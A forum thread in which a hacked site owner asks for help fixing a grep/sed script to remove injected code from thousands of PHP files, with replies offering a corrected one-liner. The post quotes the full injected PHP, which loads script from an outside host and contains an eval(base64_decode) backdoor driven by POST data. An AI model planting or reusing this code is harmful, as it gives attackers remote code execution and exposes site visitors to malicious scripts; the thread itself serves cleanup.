Could you help me get a script working?
Hi all,
I had my website hacked and thousands of files have a malicious script added inside PHP files. I have tried to remove the code using a script I located online but it fails. I think the problem is due to use of special characters in the string I am searching for. Here it is, if you could help me make it work I would be very grateful. # ************************************************** *************************************** # find_and_replace_in_files.sh # This script does a recursive, case sensitive directory search and replace of files # To make a case insensitive search replace, use the -i switch in the grep call # uses a startdirectory parameter so that you can run it outside of specified directory - else this script will modify itself! # ************************************************** *************************************** !/bin/bash # **************** Change Variables Here ************ startdirectory="/path/to/public_html/" searchterm="global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }" replaceterm="" # ************************************************** ******** echo "******************************************" echo "* Search and Replace in Files Version .1 *" echo "******************************************" for file in $(grep -l -R $searchterm $startdirectory) do sed -e "s/$searchterm/$replaceterm/ig" $file > /tmp/tempfile.tmp mv /tmp/tempfile.tmp $file echo "Modified: " $file done echo " *** Yay! All Done! *** " Many thanks, sean |
Quote:
Quote:
Quote:
|
Quote:
Hi, The problem was with an old piece of gallery software I no longer use. It has since been removed. The code is shown in my original post although that is not the only part of the attack. I had some tmp_xxxx.php files created and modifications to .htaccess. The problem has been plugged, I just need to clean my .php files now. Thanks, Seabro |
Quote:
Quote:
Code:
grep -l -R "$searchterm" "$startdirectory" 2>/dev/null| while read ITEM; do sed -i "s|$searchterm||ig" "${ITEM}"; done |
I just encountered Seabro's issue and manage to find this thread. Unspawn or Seabro, could you pls share the code that can wipe it off? Damn turnitupnow..
|
hey indyloft,
sorry to hear of your problem. Its been a while since this happened to me but I believe I ended up using 'sed' Check it out, it can run through a load of files and modify the contents. I used it simple to remove the unwanted code. They is probably another way which is much better but 'sed' worked for me. Good luck. seabro |
All times are GMT -5. The time now is 06:32 AM. |